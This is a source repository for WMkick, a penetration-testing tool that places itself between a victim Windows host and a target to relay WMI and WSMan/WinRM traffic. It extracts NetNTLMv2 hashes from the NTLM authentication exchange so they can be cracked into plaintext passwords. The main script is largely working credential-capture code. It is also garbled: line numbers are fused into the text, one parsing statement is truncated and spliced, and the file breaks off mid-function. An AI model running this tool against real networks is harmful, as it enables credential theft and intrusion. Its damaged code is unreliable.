├── .gitseed
├── MANIFEST.in
├── README.CREDITS
├── README.HOWTO
├── Makefile
├── wmkick_lib
│   └── __init__.py
├── README
├── README.INSTALL
├── setup.py
├── pylint.rc
├── wmkick.py
└── README.LICENSE

/.gitseed:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/MANIFEST.in:
--------------------------------------------------------------------------------
exclude *
include Makefile
include README
include README.CREDITS
include README.HOWTO
include README.INSTALL
include README.LICENSE
include setup.py
include wmkick.py
include wmkick_lib/*.py
--------------------------------------------------------------------------------
/README.CREDITS:
--------------------------------------------------------------------------------
Table of Contents

Section 1 .................... Credits
Section 2 .................... Sponsors
Section 3 .................... Maintainers

1 Credits

Thanks to all those who have contributed to this project. Any
contribution that moves the project forward is appreciated. Those
who have made noteworthy contributions are listed below in
alphabetical order.

  Hunt, Houston
  Monroe, Klayton
  Segreti, Joe

2 Sponsors

Thanks to our sponsors listed below in chronological order.

  KoreLogic (2020-present)

3 Maintainers

Thanks to our maintainers listed below in alphabetical order.

  Hunt, Houston

--------------------------------------------------------------------------------
/README.HOWTO:
--------------------------------------------------------------------------------

To use WMkick, you need at least three hosts: 1) a victim Windows
host, 2) a WMkick redirection host, and 3) a target Windows host
that accepts WMI (135/TCP), WSMAN HTTP (5985/TCP), or WSMAN HTTPS
(5986/TCP) requests via NTLMSSP.

Since WMkick is a Man-In-The-Middle (MITM) utility, you must
arrange to have authentication requests from the victim host
flow through the WMkick host on their way to the target host. The
diagram below depicts the required setup and traffic flows.

  +----------+            +----------+             +----------+
  |          |----------->|          |             |          |
  |  Victim  |            |  WMkick  |------------>|  Target  |
  |   Host   |            |   Host   |<------------|   Host   |
  |          |<-----------|          |             |          |
  +----------+            +----------+             +----------+

--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------

all:
	@ echo "Usage: make build " ; \
	  echo "       make check" ; \
	  echo "       make clean" ; \
	  echo "       make clean-all" ; \
	  echo "       make dist" ; \
	  echo "       make install" ; \
	  echo "       make install-dev" ; \
	  echo "       make lint" ; \
	  echo "       make sdist (alias for dist)" ; \
	  echo "       make tests (alias for check)" ; \
	  echo "       make uninstall-dev" ; \
	  echo "       make vbump" ; \

build::
	@ python3 setup.py build

check:
	@ ( cd tests && make $@ )

clean:
	@ rm -f MANIFEST `find . -name "*.pyc" -o -name "*~" -o -name "*.lint"`
	@ rm -rf build wmkick.egg-info `find . -name __pycache__ -type d`

clean-all: clean

dist sdist::
	@ python3 setup.py sdist

install: build
	@ python3 setup.py install

install-dev:
	@ python3 setup.py --quiet develop --user

lint:
	@ for file in `find . -name "*.py" | egrep -v '(__init__|setup)[.]py'` ; do echo "$${file} --> $${file}.lint" ; pylint --rcfile=pylint.rc --exit-zero $${file} > $${file}.lint ; done

tests: check

uninstall-dev:
	@ python3 setup.py --quiet develop --uninstall --user > /dev/null 2>&1
	@ rm -f ~/.local/bin/wmkick.py

vbump:
	@ version_helper_git_pep440 -b + -f wmkick_lib/__init__.py

--------------------------------------------------------------------------------
/wmkick_lib/__init__.py:
--------------------------------------------------------------------------------
"""
Copyright 2020-2021 The WMkick Project, All Rights Reserved.

This software, having been partly or wholly developed and/or
sponsored by KoreLogic, Inc., is hereby released under the terms
and conditions set forth in the project's "README.LICENSE" file.
For a list of all contributors and sponsors, please refer to the
project's "README.CREDITS" file.
"""

VERSION = 0x00302800

def get_release_number():
    """Return the current release version as a number."""
    return VERSION

def get_release_string_pep440():
    """Return the current release version as a string (PEP 440 compliant)."""
    major = (VERSION >> 28) & 0x0f
    minor = (VERSION >> 20) & 0xff
    patch = (VERSION >> 12) & 0xff
    state = (VERSION >> 10) & 0x03
    build = VERSION & 0x03ff
    if state == 0:
        state_string = "dev"
    elif state == 1:
        state_string = "rc"
    elif state == 2:
        state_string = "post"
    elif state == 3:
        state_string = "post"
    release_string = "unknown"
    if state == 2 and build == 0:
        release_string = '%d.%d.%d' % (major, minor, patch)
    else:
        if state == 3:
            build = build + 0x400
        release_string = '%d.%d.%d.%s%d' % (major, minor, patch, state_string, build)
    return release_string

--------------------------------------------------------------------------------
/README:
--------------------------------------------------------------------------------

Table of Contents

Section 1 .................... Overview
Section 2 .................... Documentation
Section 3 .................... License
Section 4 .................... References

1 Overview

WMkick is a TCP protocol redirector/MITM tool that targets NTLM
authentication message flows in WMI (135/tcp) and
Powershell-Remoting/WSMan/WinRM (5985/tcp) to capture NetNTLMv2
hashes. Once a hash has been captured, popular cracking tools such
as Hashcat and JtR can be used to recover plaintext passwords.
WMkick automates the hash extraction process and alleviates the
need to build/use a WMI (or WSMAN) Auth Server or perform manual
packet analysis.

A use case for WMkick is for internal penetration tests.
If the penetration tester can redirect these protocols to their own
Windows virtual machine or remote target hosting WMI or WSMan
services, it is possible to obtain a valid NetNTLMv2 hash, which
can be cracked into a plaintext credential, in order to go from
a non-credentialed to a credentialed perspective. A situation that
may be observed in the target environment is software or
administrative scripts running remote WMI or WSMan commands over a
subnet in which wmkick is running; an attacker may take advantage
of this.

2 Documentation

See README.INSTALL for requirements and instructions on how to
build, test, and install this software.

3 License

The terms and conditions under which this software is released are
set forth in README.LICENSE.

4 References

The NT LAN Manager (NTLM) Authentication Protocol is documented
here:

  https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-NLMP/%5bMS-NLMP%5d.pdf

--------------------------------------------------------------------------------
/README.INSTALL:
--------------------------------------------------------------------------------

Table of Contents

Section 1 .................... Requirements
Section 2 .................... Installation
Section 2.1 .................. Production Install
Section 2.2 .................. Developmental Install

1 Requirements

WMkick is known to work on Linux platforms running Python 3.7.3 or
higher. The minimum required Python version is 3.3. Other platforms
and earlier versions of Python may work, but have not been tested.

WMkick requires the following external modules:

  - coloredlogs (https://pypi.org/project/coloredlogs/)
  - scapy (https://pypi.org/project/scapy/)

The installation process requires Python's setuptools. Depending on
your environment, setuptools can be installed as documented below.

Gentoo:

  $ sudo emerge -av setuptools

Debian-ish:

  $ sudo apt install python-setuptools

Python:

  $ pip3 install setuptools

2 Installation

Two forms of installation are supported: production and
developmental. Use the production form if your goal is to
install the software and use it in some official capacity. Use
the developmental form if your goal is to evaluate, test, or
develop the software.

2.1 Production Install

To install this software in the appropriate Python site-packages
directory for your system, run:

  $ sudo make install

Standalone scripts will be installed under /usr/local/bin.

2.2 Developmental Install

To install this software for evaluation, testing, or development
purposes, run:

  $ make install-dev

This will install a placeholder in Python's site-packages under
~/.local that points to the top-level source directory (assuming
that's where you are currently located). Any modifications made
to the code will automatically be reflected when running the
software. Additionally, user-executable scripts will be placed
under ~/.local/bin. Make sure that ~/.local/bin is in your PATH.

Note that this environment can be torn down, if no longer needed,
with:

  $ make uninstall-dev

--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Configuration script for packaging project."""

from distutils.command.sdist import sdist
from pkgutil import find_loader
from sys import platform, stderr, version_info
from setuptools import find_packages, setup

from wmkick_lib import get_release_string_pep440

# Disable version normalization performed by setup(). This code
# indirectly depends on the CustomSDist class to handle our 'rc'
# version numbers, which have the following format: 'X.Y.Z.rcN'.
# The desired package name format is: 'package-X.Y.Z.rcN.tar.gz'.
# Without CustomSDist, we get: 'package-X.Y.ZrcN.tar.gz' (i.e.,
# the '.' separator between 'Z' and 'rcN' has been eliminated).
# The patch/workaround below is documented here:
#
#   https://github.com/pypa/setuptools/issues/308
#
try:
    # Try the approach of using sic(), added in setuptools 46.1.0.
    from setuptools import sic
except ImportError:
    # Try the approach of replacing packaging.version.Version.
    sic = lambda v: v
    try:
        # Note that setuptools >=39.0.0 uses packaging from setuptools.extern.
        from setuptools.extern import packaging
    except ImportError:
        # Note that setuptools <39.0.0 uses packaging from pkg_resources.extern.
        from pkg_resources.extern import packaging
    packaging.version.Version = packaging.version.LegacyVersion

class CustomSDist(sdist):

    def run(self):
        super().run()

    def prune_file_list(self):
        """Prune off branches that might slip into the file list as created
        by 'read_template()', but really don't belong there:
          * the build tree (typically "build")
          * the release tree itself (only an issue if we ran "sdist"
            previously with --keep-temp, or it aborted)
          * any RCS, CVS, .svn, .hg, .git*, .bzr, _darcs directories
        """
        build = self.get_finalized_command('build')
        base_dir = self.distribution.get_fullname()

        self.filelist.exclude_pattern(None, prefix=build.build_base)
        self.filelist.exclude_pattern(None, prefix=base_dir)

        # pruning out vcs directories
        # both separators are used under win32
        if platform == 'win32':
            seps = r'/|\\'
        else:
            seps = '/'

        vcs_dirs = ['RCS', 'CVS', r'\.svn', r'\.hg', r'\.git.*', r'\.bzr', '_darcs']
        vcs_ptrn = r'(^|%s)(%s)(%s).*' % (seps, '|'.join(vcs_dirs), seps)
        self.filelist.exclude_pattern(vcs_ptrn, is_regex=1)

def get_install_requires():
    """Returns a list of required modules."""
    install_requires = ['coloredlogs', 'scapy']
    if find_loader('kargparse'):
        install_requires.append('kargparse')
    return install_requires

if version_info < (3, 3, 0):
    print("This project requires Python version 3.3.0 or higher.", file=stderr)
    exit(2)

setup(
    author='Houston Hunt',
    author_email='hhunt.git@korelogic.com',
    classifiers=['Operating System :: POSIX :: Linux'],
    cmdclass={'sdist': CustomSDist},
    description="""A WMI and Powershell-Remoting/WSMan/WinRM TCP protocol redirector/MITM tool to capture NetNTLMv2 hashes.""",
    install_requires=get_install_requires(),
    license='GPL-3',
    long_description=
"""
WMkick is a TCP protocol redirector/MITM tool that targets
NTLM authentication message flows in WMI (135/tcp) and
Powershell-Remoting/WSMan/WinRM (5985/tcp) to capture NetNTLMv2
hashes. Once a hash has been captured, popular cracking tools such
as Hashcat and JtR can be used to recover plaintext passwords.
WMkick automates the hash extraction process and alleviates the
need to build/use a WMI (or WSMAN) Auth Server or perform manual
packet analysis.
""",
    name='wmkick',
    packages=find_packages(),
    platforms=['Linux'],
    scripts=['wmkick.py'],
    url='https://www.korelogic.com',
    version=sic(get_release_string_pep440())
)

--------------------------------------------------------------------------------
/pylint.rc:
--------------------------------------------------------------------------------
[MASTER]

# Specify a configuration file.
#rcfile=

# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=

# Profiled execution.
profile=no

# Add files or directories to the blacklist. They should be base names, not
# paths.
ignore=CVS

# Pickle collected data for later comparisons.
persistent=yes

# List of plugins (as comma separated values of python modules names) to load,
# usually to register additional checkers.
load-plugins=


[MESSAGES CONTROL]

# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time.
#enable=

# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once).
disable=C0301,C0305,R0903,R0913,W0703,W0603


[REPORTS]

# Set the output format. Available formats are text, parseable, colorized, msvs
# (visual studio) and html
output-format=parseable

# Include message's id in output
include-ids=no

# Put messages in a separate file for each module / package specified on the
# command line instead of printing them on stdout. Reports (if any) will be
# written in a file name "pylint_global.[txt|html]".
files-output=no

# Tells whether to display a full report or only the messages
reports=yes

# Python expression which should return a note less than 10 (10 is the highest
# note). You have access to the variables errors warning, statement which
# respectively contain the number of errors / warnings messages and the total
# number of statements analyzed. This is used by the global evaluation report
# (RP0004).
evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)

# Add a comment according to your evaluation note. This is used by the global
# evaluation report (RP0004).
comment=no


[BASIC]

# Required attributes for module, separated by a comma
required-attributes=

# List of builtins function names that should not be used, separated by a comma
bad-functions=map,filter,apply,input

# Regular expression which should only match correct module names
module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$

# Regular expression which should only match correct module level names
const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$

# Regular expression which should only match correct class names
class-rgx=[A-Z_][a-zA-Z0-9]+$

# Regular expression which should only match correct function names
function-rgx=[a-z_][a-z0-9_]{2,30}$

# Regular expression which should only match correct method names
method-rgx=[a-z_][a-z0-9_]{2,30}$

# Regular expression which should only match correct instance attribute names
attr-rgx=[a-z_][a-z0-9_]{2,30}$

# Regular expression which should only match correct argument names
argument-rgx=[a-z_][a-z0-9_]{2,30}$

# Regular expression which should only match correct variable names
variable-rgx=[a-z_][a-z0-9_]{2,30}$

# Regular expression which should only match correct list comprehension /
# generator expression variable names
inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$

# Good variable names which should always be accepted, separated by a comma
good-names=i,j,k,ex,Run,_

# Bad variable names which should always be refused, separated by a comma
bad-names=foo,bar,baz,toto,tutu,tata

# Regular expression which should only match functions or classes name which do
# not require a docstring
no-docstring-rgx=__.*__


[FORMAT]

# Maximum number of characters on a single line.
max-line-length=120

# Maximum number of lines in a module
max-module-lines=5000

# String used as indentation unit. This is usually "    " (4 spaces) or "\t" (1
# tab).
indent-string='    '


[TYPECHECK]

# Tells whether missing members accessed in mixin class should be ignored. A
# mixin class is detected if its name ends with "mixin" (case insensitive).
ignore-mixin-members=yes

# List of classes names for which member attributes should not be checked
# (useful for classes with attributes dynamically set).
ignored-classes=SQLObject

# When zope mode is activated, add a predefined set of Zope acquired attributes
# to generated-members.
zope=no

# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E0201 when accessed. Python regular
# expressions are accepted.
generated-members=REQUEST,acl_users,aq_parent


[SIMILARITIES]

# Minimum lines number of a similarity.
min-similarity-lines=4

# Ignore comments when computing similarities.
ignore-comments=yes

# Ignore docstrings when computing similarities.
ignore-docstrings=yes


[VARIABLES]

# Tells whether we should check for unused import in __init__ files.
init-import=no

# A regular expression matching the beginning of the name of dummy variables
# (i.e. not used).
dummy-variables-rgx=_|dummy

# List of additional names supposed to be defined in builtins. Remember that
# you should avoid to define new builtins when possible.
additional-builtins=


[MISCELLANEOUS]

# List of note tags to take in consideration, separated by a comma.
notes=FIXME,XXX,TODO


[CLASSES]

# List of interface methods to ignore, separated by a comma. This is used for
# instance to not check methods defines in Zope's Interface base class.
ignore-iface-methods=isImplementedBy,deferred,extends,names,namesAndDescriptions,queryDescriptionFor,getBases,getDescriptionFor,getDoc,getName,getTaggedValue,getTaggedValueTags,isEqualOrExtendedBy,setTaggedValue,isImplementedByInstancesOf,adaptWith,is_implemented_by

# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,__new__,setUp

# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls


[IMPORTS]

# Deprecated modules which should not be used, separated by a comma
deprecated-modules=regsub,TERMIOS,Bastion,rexec

# Create a graph of every (i.e. internal and external) dependencies in the
# given file (report RP0402 must not be disabled)
import-graph=

# Create a graph of external dependencies in the given file (report RP0402 must
# not be disabled)
ext-import-graph=

# Create a graph of internal dependencies in the given file (report RP0402 must
# not be disabled)
int-import-graph=


[DESIGN]

# Maximum number of arguments for function / method
max-args=5

# Argument names that match this expression will be ignored. Default to name
# with leading underscore
ignored-argument-names=_.*

# Maximum number of locals for function / method body
max-locals=15

# Maximum number of return / yield for function / method body
max-returns=6

# Maximum number of branch for function / method body
max-branchs=12

# Maximum number of statements in function / method body
max-statements=50

# Maximum number of parents for a class (see R0901).
max-parents=7

# Maximum number of attributes for a class (see R0902).
max-attributes=7

# Minimum number of public methods for a class (see R0903).
min-public-methods=2

# Maximum number of public methods for a class (see R0904).
max-public-methods=20


[EXCEPTIONS]

# Exceptions that will emit a warning when being caught. Defaults to
# "Exception"
overgeneral-exceptions=Exception
--------------------------------------------------------------------------------
/wmkick.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""
Copyright 2020-2021 The WMkick Project, All Rights Reserved.

This software, having been partly or wholly developed and/or
sponsored by KoreLogic, Inc., is hereby released under the terms
and conditions set forth in the project's "README.LICENSE" file.
For a list of all contributors and sponsors, please refer to the
project's "README.CREDITS" file.
"""

__description__ = """
WMkick is a TCP protocol redirector/MITM tool that targets
NTLM authentication message flows in WMI (135/tcp) and
Powershell-Remoting/WSMan/WinRM (5985/tcp) to capture NetNTLMv2
hashes. Once a hash has been captured, popular cracking tools such as
Hashcat and JtR can be used to recover plaintext passwords.
WMkick 18 | automates the hash extraction process and alleviates the need to 19 | build/use a WMI (or WSMAN) Authentication Server or perform manual 20 | packet analysis. 21 | """ 22 | 23 | from base64 import b64decode 24 | from codecs import encode 25 | from collections import defaultdict, OrderedDict 26 | from errno import ECONNRESET 27 | from signal import signal, SIGINT 28 | from ipaddress import IPv4Address, AddressValueError 29 | from logging import addLevelName, Filter, getLogger, StreamHandler 30 | from os import geteuid 31 | from re import compile as re_compile, DOTALL 32 | from socket import AF_INET, SHUT_RDWR, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR 33 | from socket import error as sock_error, gaierror, getfqdn, gethostbyname, socket 34 | from struct import unpack 35 | from sys import stderr, stdout 36 | from threading import Thread 37 | 38 | from coloredlogs import ColoredFormatter 39 | from scapy.all import sniff 40 | 41 | from wmkick_lib import get_release_string_pep440 42 | 43 | try: 44 | from kargparse.parser import KArgumentParser as ArgumentParser 45 | except ImportError: 46 | from argparse import ArgumentParser 47 | 48 | BANNER = r""" 49 | ___ ______ ___ _ _ _ 50 | \ \ / / \/ | | _(_) ___| | __ 51 | \ \ /\ / /| | | | |/ / |/ __| |/ / 52 | \ V V / | |\/| | <| | (__| < 53 | \__/\__/ |__| |__|_|\_\_|\___|_|\_\ 54 | Author: Houston Hunt, KoreLogic, Inc.""" 55 | 56 | MSG_TYPES = defaultdict(lambda: "UNKNOWN") 57 | MSG_TYPES[1] = "Request" 58 | MSG_TYPES[2] = "Challenge" 59 | MSG_TYPES[3] = "Response" 60 | HASH_LOG_LEVEL = 45 61 | WMI_PORT = 135 62 | WSMAN_HTTP_PORT = 5985 63 | WSMAN_HTTPS_PORT = 5986 64 | 65 | class NetNTLMv2Data: 66 | """ 67 | Holds all information about a NetNTLMv2 Hash, which is built from 68 | elements of NTLMSSP negotiation messages. 
69 | """ 70 | def __init__(self, dport): 71 | if dport == WMI_PORT: 72 | self.tcp_protocol = "WMI" 73 | elif dport == WSMAN_HTTP_PORT: 74 | self.tcp_protocol = "WSMAN_HTTP" 75 | else: 76 | self.tcp_protocol = None 77 | self.username = None 78 | self.domain = None 79 | self.server_challenge = None 80 | self.ntlm_blob_hmac = None 81 | self.ntlm_blob = None 82 | self.logger = getLogger(__name__) 83 | 84 | def log_complete(self): 85 | """ 86 | Return true if all elements necessary to build a NetNTLMv2 hash 87 | exist. 88 | """ 89 | ntlm_hash_components = dict(vars(self).items()) 90 | if None in ntlm_hash_components.values(): 91 | return False 92 | 93 | self.logger.log(HASH_LOG_LEVEL, "%s Found:\n%s::%s:%s:%s:%s", 94 | self.tcp_protocol, 95 | self.username, 96 | self.domain, 97 | self.server_challenge, 98 | self.ntlm_blob_hmac, 99 | self.ntlm_blob) 100 | return True 101 | 102 | 103 | class RedirectionHandler(Thread): 104 | """ 105 | Redirects a monitored protocol to the target Windows host. 106 | """ 107 | def __init__(self, 108 | group=None, 109 | target=None, 110 | name=None, 111 | args=(), 112 | kwargs=None, 113 | daemon=None, 114 | listen_ip=None, 115 | listen_port=None, 116 | target_ip=None, 117 | target_port=None, 118 | max_connections=16, 119 | logger=None): 120 | 121 | super().__init__(group=group, 122 | target=target, 123 | name=name, 124 | args=args, 125 | kwargs=kwargs, 126 | daemon=daemon) 127 | self.src_ip = listen_ip 128 | self.src_port = listen_port 129 | self.dst_ip = target_ip 130 | self.dst_port = target_port 131 | self.max_connections = max_connections 132 | if logger is None: 133 | self.logger = getLogger(__name__) 134 | else: 135 | self.logger = logger 136 | self.server_socket = socket(AF_INET, SOCK_STREAM) 137 | self.server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 138 | try: 139 | self.server_socket.bind((listen_ip, listen_port)) 140 | self.server_socket.listen(self.max_connections) 141 | except OSError as oserr: 142 | 
self.logger.error("Check listening ip/port: %s", oserr) 143 | exit(3) 144 | 145 | def run(self): 146 | self.server(self.src_ip, self.src_port, self.dst_ip, self.dst_port) 147 | 148 | def server(self, local_host, local_port, remote_host, remote_port): 149 | """Creates redirection server sockets.""" 150 | self.logger.info('Redirecting traffic from [%s:%d] to [%s:%d]', 151 | local_host, 152 | local_port, 153 | remote_host, 154 | remote_port) 155 | while True: 156 | victim_socket, victim_address = self.server_socket.accept() 157 | self.logger.info("Connection from [%s:%s], attempt REMOTE server [%s:%d]", 158 | victim_address[0], 159 | victim_address[1], 160 | remote_host, 161 | remote_port) 162 | connection_thread = Thread(target=self.connect_target, args=(remote_host, remote_port, victim_socket)) 163 | connection_thread.setDaemon(True) 164 | connection_thread.start() 165 | 166 | def connect_target(self, remote_host, remote_port, victim_socket): 167 | """ 168 | After accepting a connection, create thread to this method to 169 | avoid blocking while connecting to target. 170 | """ 171 | remote_socket = socket(AF_INET, SOCK_STREAM) 172 | try: 173 | remote_socket.connect((remote_host, remote_port)) 174 | svr_soc_thread = Thread(target=self.transfer, args=(remote_socket, victim_socket, False)) 175 | rem_soc_thread = Thread(target=self.transfer, args=(victim_socket, remote_socket, True)) 176 | svr_soc_thread.setDaemon(True) 177 | rem_soc_thread.setDaemon(True) 178 | rem_soc_thread.start() 179 | svr_soc_thread.start() 180 | except sock_error as exception: 181 | remote_socket.close() 182 | victim_socket.close() 183 | self.logger.error("Exception caught as socket.error : %s", exception) 184 | 185 | def transfer(self, src, dst, direction_is_outbound): 186 | """ 187 | Transfers data from redirector/listening host to target 188 | Windows host. 
189 | """ 190 | try: 191 | src_address = src.getsockname()[0] 192 | victim_address, victim_port = src.getpeername() 193 | win_host_address, win_host_port = dst.getpeername() 194 | except OSError as oserr: 195 | self.logger.error("Exception caught : %s", oserr) 196 | 197 | while True: 198 | try: 199 | buffer = src.recv(0x1000) 200 | if len(buffer) == 0: # pylint: disable=C1801 201 | break 202 | if direction_is_outbound: 203 | self.logger.debug("%s:%d --- %s --> %s:%d [buff: %d]", 204 | victim_address, 205 | victim_port, 206 | src_address, 207 | win_host_address, 208 | win_host_port, 209 | len(buffer)) 210 | else: 211 | self.logger.debug("%s:%d <-- %s --- %s:%d [buff: %d]", 212 | win_host_address, 213 | win_host_port, 214 | src_address, 215 | victim_address, 216 | victim_port, 217 | len(buffer)) 218 | try: 219 | dst.send(buffer) 220 | except IOError: 221 | pass 222 | 223 | # Pass over connection reset errors. 224 | except sock_error as err: 225 | if err.errno != ECONNRESET: 226 | self.logger.error("Exception caught : %s", err) 227 | break 228 | 229 | try: 230 | if src.fileno() != -1: 231 | src.shutdown(SHUT_RDWR) 232 | src.close() 233 | if dst.fileno() != -1: 234 | dst.shutdown(SHUT_RDWR) 235 | dst.close() 236 | except OSError as err: 237 | if err.errno != 107: 238 | raise 239 | 240 | 241 | class NTLMHandler(Thread): 242 | """ 243 | Captures traffic matching the selected protocols on the victim 244 | and redirector sides, and asynchronously checks for NTLMSSP 245 | message traffic. If found, it stores information in a dictionary 246 | where they key is the ephemeral port and the NetNTLMv2Data 247 | object is the value. Once the final NTLM Authenticate message 248 | is observed, verifies that all required elements are available 249 | to construct and log the hash. 
250 | """ 251 | def __init__(self, 252 | group=None, 253 | target=None, 254 | name=None, 255 | args=(), 256 | kwargs=None, 257 | daemon=None, 258 | listen_ip=None, 259 | listen_port=None, 260 | target_ip=None, 261 | logger=None): 262 | 263 | super().__init__(group=group, 264 | target=target, 265 | name=name, 266 | args=args, 267 | kwargs=kwargs, 268 | daemon=daemon) 269 | self.listen_ip = listen_ip 270 | self.listen_port = listen_port 271 | self.target_ip = target_ip 272 | self.tracker = {} # Use dynamic port as a key to track NetNTLMv2Data objects. 273 | if logger is None: 274 | self.logger = getLogger(__name__) 275 | else: 276 | self.logger = logger 277 | 278 | def search_ntlm(self, packet): 279 | """ 280 | Check for NTLMSSP within packet based on TCP protocol found and 281 | store the required hash information based on the step in the 282 | NTLM authentication call flow. 283 | """ 284 | dport = packet.getlayer("TCP").dport 285 | sport = packet.getlayer("TCP").sport 286 | ntlm_data = None 287 | if WMI_PORT in (dport, sport): 288 | if bytes(packet).find(b"NTLMSSP") > 0: 289 | pattern = re_compile(b"NTLMSSP(.*)", DOTALL) 290 | try: 291 | ntlm_data = pattern.search(bytes(packet)).group() 292 | except AttributeError: 293 | return 294 | else: 295 | return 296 | 297 | elif WSMAN_HTTP_PORT in (dport, sport): 298 | if bytes(packet).find(b"Negotiate") > 0: 299 | pattern = re_compile(b"Negotiate (.*?)\r\n") 300 | try: 301 | base64encodeddata = pattern.search(bytes(packet)).group(1) 302 | ntlm_data = b64decode(base64encodeddata) 303 | except AttributeError: 304 | return 305 | except Exception as err: 306 | self.logger.error(err) 307 | return 308 | else: 309 | return 310 | 311 | else: 312 | return 313 | 314 | msg_type = unpack("Q", ntlm_data[24:32])[0], 'x') 324 | self.tracker[packet.getlayer("TCP").dport].server_challenge = chall 325 | elif msg_type == 3: 326 | # This is the Authenticate Message. 
            # Start after what we know, which is Signature (8b) and Message Type (4b).
            # Extract what we need: the six Len/MaxLen/BufferOffset triples
            # (LM response, NT response, domain, user name, workstation,
            # session key), which MS-NLMP defines as little-endian unsigned fields.
            ntlm_tup = unpack("<HHIHHIHHIHHIHHIHHI", ntlm_data[12:60])

            # Find the domain.
            domain_len = ntlm_tup[6]
            domain_offset = ntlm_tup[8]
            domain = ntlm_data[domain_offset:domain_offset+domain_len].decode('utf-16-le')
            # Find the username.
            user_len = ntlm_tup[9]
            user_offset = ntlm_tup[11]
            username = ntlm_data[user_offset:user_offset+user_len].decode('utf-16-le')
            # Find the challenge/response.
            resp_len = ntlm_tup[3]
            resp_offset = ntlm_tup[5]
            ntchallenge = ntlm_data[resp_offset:resp_offset+resp_len]
            ntlm_blob_hmac = encode(ntchallenge, 'hex_codec')[:32].decode('ascii')
            ntlm_blob = encode(ntchallenge, 'hex_codec')[32:].decode("ascii")

            # Save information in the tracker dictionary.
            sport = packet.getlayer("TCP").sport
            self.tracker[sport].domain = domain
            self.tracker[sport].username = username
            self.tracker[sport].ntlm_blob_hmac = ntlm_blob_hmac
            self.tracker[sport].ntlm_blob = ntlm_blob

            # Check to see if all required elements have been acquired. If
            # yes, build and log the corresponding NetNTLMv2 hash.
            if self.tracker[sport].log_complete():
                del self.tracker[sport]

        else:
            self.logger.debug("Unknown message structure. Here is a hex-dump:")
            self.logger.debug(ntlm_data.hex())

    def run(self):
        self.logger.info("Sniffer starting on %s port %s", self.listen_ip, self.listen_port)
        # Creates a Berkeley Packet Filter to observe NTLM Authentication flow
        # request, challenge, and response messages, keeping track of them via
        # dynamic tcp port. Currently configured to only observe traffic between
        # victim and redirector.
        filteropt = (
            '(ip dst host %s and dst port %s) or (ip src host %s and src port %s) and (not host %s)'
            % (self.listen_ip, self.listen_port, self.listen_ip, self.listen_port, self.target_ip)
        )

        sniff(filter=filteropt, prn=self.search_ntlm)


def catch_sigint(signal_number, stack_frame):  # pylint: disable=W0613
    """
    Handle interrupt (i.e., SIGINT) signals received from the keyboard
    (e.g., 'CTRL+C') or other processes (e.g., 'kill -INT ').
    """
    print()
    getLogger(__name__).warning("Caught a SIGINT signal. Exiting...")
    exit(0)

def create_thread_pair(threads, listen_ip, target_ip, protocol):
    """
    Create a pair of threads: one for redirection and one for monitoring.
    """
    ports = {'wmi': WMI_PORT, 'wsman-http': WSMAN_HTTP_PORT, 'wsman-https': WSMAN_HTTPS_PORT}
    name = protocol
    logger = getLogger(__name__)
    threads[name] = RedirectionHandler(name=name,
                                       daemon=True,
                                       listen_ip=listen_ip,
                                       listen_port=ports[protocol],
                                       target_ip=target_ip,
                                       target_port=ports[protocol],
                                       logger=logger)
    name = name + '-sniffer'
    threads[name] = NTLMHandler(name=name,
                                daemon=True,
                                listen_ip=listen_ip,
                                listen_port=ports[protocol],
                                target_ip=target_ip,
                                logger=logger)

def setup_logging(log_level):
    """
    Defines the styling for a custom set of log levels, configures
    console logging for stderr and stdout, and returns a reference
    to the modified logger.
    """

    # Define styling for a custom set of log levels.
    level_styles = {'critical': {'bold': True, 'color': 'red'},
                    'debug': {'color': 'blue'},
                    'error': {'color': 'red'},
                    'info': {},
                    'notice': {'color': 'magenta'},
                    'spam': {'color': 'green', 'faint': True},
                    'success': {'bold': True, 'color': 'green'},
                    'verbose': {'color': 'blue'},
                    'warning': {'color': 'yellow'},
                    'hash': {'bold': True, 'color': 'green'}}
    addLevelName(HASH_LOG_LEVEL, "HASH")
    logger_setup = getLogger(__name__)
    logger_setup.setLevel(log_level)

    # Configure console logging for stderr and stdout. Everything except
    # HASH_LOG_LEVEL is logged to stderr.
    stdout_handler = StreamHandler(stdout)
    stdout_handler.setLevel(45)
    stdout_handler.addFilter(
        type('', (Filter,), {'filter': staticmethod(lambda r: r.levelno == HASH_LOG_LEVEL)})
    )
    stdout_handler.setFormatter(
        ColoredFormatter(fmt='%(levelname)s %(asctime)s %(message)s', level_styles=level_styles)
    )
    stderr_handler = StreamHandler(stderr)
    stderr_handler.setLevel(10)
    stderr_handler.addFilter(
        type('', (Filter,), {'filter': staticmethod(lambda r: r.levelno != HASH_LOG_LEVEL)})
    )
    stderr_handler.setFormatter(
        ColoredFormatter(fmt='%(levelname)s %(asctime)s %(message)s', level_styles=level_styles)
    )
    logger_setup.addHandler(stdout_handler)
    logger_setup.addHandler(stderr_handler)

    # Return a reference to the modified logger.
    return logger_setup


def main():
    """Program entry point if called as an executable."""

    log_levels = OrderedDict({'critical': 50, 'error': 40, 'warning': 30, 'info': 20, 'debug': 10})

    parser = ArgumentParser(description=__description__)
    parser.add_argument('-L', '--log-level',
                        choices=list(log_levels),
                        default='info',
                        help="""
        Set the level of detail logged to the screen. Valid choices include:
        %(choices)s. Note that these choices are ordered from left to right
        according to the amount of information/detail (i.e., least to most)
        they provide. The default value is '%(default)s'.
        """,
                        metavar='level')
    parser.add_argument('-l', '--listen-host',
                        default=None,
                        help="""
